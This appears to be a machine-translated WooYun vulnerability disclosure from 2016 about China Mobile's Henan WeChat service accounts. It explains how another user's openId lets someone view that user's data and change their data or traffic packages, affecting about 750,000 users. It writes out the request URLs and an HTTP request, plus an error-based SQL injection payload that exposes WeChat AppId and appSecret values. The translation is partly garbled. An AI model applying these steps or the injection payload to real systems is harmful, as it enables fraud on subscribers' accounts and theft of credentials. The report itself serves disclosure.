漏洞标题 一个省的移动设计缺陷可以为75w用户和互联网流量包开放服务免费打包 相关制造商 中国移动 漏洞作者 过路人 提交时间 2016-05-11 20: 10 公共时间 2016-06-27 17: 00 漏洞类型 设计缺陷/逻辑错误 危险等级 高 自我评估等级 14 漏洞状态 已提交给第三方合作机构(cncert National Internet Emergency Center) 标签标签 漏洞详细信息 它与两个微信公众账号有关。
打开河南移动10086公众号() 输入更多服务
点击里面查看
主要的URL部分如下: 1.http://**。**。**/weixin/khfwController.dogoIndex& openId=oMAmUjlbJIiy4fJ7xtZ2k9NgLL-I
打开第一个 我不知道我是否没有约束力或其他东西。 这是由其他人的手机号码写的。
河南手机号码可以查询 看着我
以下两家企业不确定它们是否会成功。 无论如何,我测试了我的失败。 似乎是一场商业冲突 漏洞证明: 2.操作75w用户包更改和Internet流量包打开 这需要得到关注微信号的openid。 郑州10086公众号 打开并处理
包更改和互联网流量包存在问题。 以下是Internet流量包的示例。
http://**。**。**。**/hkwx/addValueProductController.do?goAddValueProductList& symbol=addvalue& openId=****& accountId=gh_065a64f56fc7 openId是公共号码的openId 打开一个。 比如五元 GET /hwwx/addValueProductController.do?goAddValueProductDetail&id=402880a94959ad4f014959ae272c0001&symbol=addvalue HTTP/1.1 主机: **。**。**。** 接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8 连接:保持活动状态 代理连接:保持活动状态 Cookie: JSESSIONID=4453F42BBC0FB439D43D5385EB20AF9B 用户代理: Mozilla/5.0(iPhone; CPU iPhone OS 9_3_1,如Mac OS X)AppleWebKit/601.1.46(KHTML,如Gecko)Mobile/13E238 MicroMessenger/6.3.16 NetType/WIFI Language/en_US 接受语言: zh-cn Referer:http://**。**。**。**/hkwx/addValueProductController.do?goAddValueProductList& symbol=addvalue& openId=User's openId& accountId=gh_065a64f56fc7 Accept-Encoding: gzip,deflate
获取openId的方法 http://**。**。**。**/hkwx/suggestionPersonController.do?goRandomPage& openId='AND(SELECT 1573 FROM(SELECT COUNT(*),CONCAT(0x71707a6271,(SELECT(ELT)(1573=1573,1) ))),0x71716a6271,FLOOR(RAND(0)* 2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)AND'UVyK'='UVyK Sql注入 在表weixin_accountinfo中 AppId和appSecret与微信公众号 开放的业务方法 首先打开 http://**。**。**。**/hkwx/addValueProductController.do?goAddValueProductList& symbol=addvalue& openId=***& accountId=gh_065a64f56fc7
然后选择一个包
然后立即点击它 确认
大约75w用户 更改包操作,这几乎是 http://**。**。**。**/hkwx/planController.do?goPlanIndexPage& openId=XXX& accountId=gh_065a64f56fc7 没有证明 河南没有这样的问题。
需要绑定并需要验证码 修理计划: 版权声明:请注明出处。居民A @乌云